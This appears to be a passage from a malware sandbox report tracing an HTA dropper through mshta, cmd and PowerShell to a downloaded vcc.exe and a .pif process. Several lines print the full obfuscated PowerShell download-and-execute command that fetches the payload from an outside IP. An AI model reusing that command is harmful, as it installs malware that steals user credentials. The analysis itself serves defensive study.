                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0288793A GetDiskFreeSpaceA,6_2_0288793A
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,11_2_004019F0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,11_2_004019F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcc[1].exeJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3080:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5600:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdzyjkd5.10s.ps1Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifCommand line argument: 08A11_2_00413780
                  Source: C:\Users\user\AppData\Roaming\vcc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: daphpvwO.pif, 0000000B.00000002.3829826144.000000002A42E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: niceworkingskilldevelopedwithgreatnews.htaVirustotal: Detection: 34%
                  Source: niceworkingskilldevelopedwithgreatnews.htaReversingLabs: Detection: 23%
                  Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\niceworkingskilldevelopedwithgreatnews.hta"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2571.tmp" "c:\Users\user\AppData\Local\Temp\gbdknv1n\CSCC8613962BFBB4D698240FB82ECB0F974.TMP"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\vcc.exe "C:\Users\user\AppData\Roaming\vcc.exe"
                  Source: C:\Users\user\AppData\Roaming\vcc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\8161.cmd""
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\vcc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\29106.cmd""
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\vcc.exeProcess created: C:\Users\user\Links\daphpvwO.pif C:\\Users\\user\\Links\daphpvwO.pif
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\vcc.exe "C:\Users\user\AppData\Roaming\vcc.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2571.tmp" "c:\Users\user\AppData\Local\Temp\gbdknv1n\CSCC8613962BFBB4D698240FB82ECB0F974.TMP"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\8161.cmd""Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\29106.cmd""Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeProcess created: C:\Users\user\Links\daphpvwO.pif C:\\Users\\user\\Links\daphpvwO.pifJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
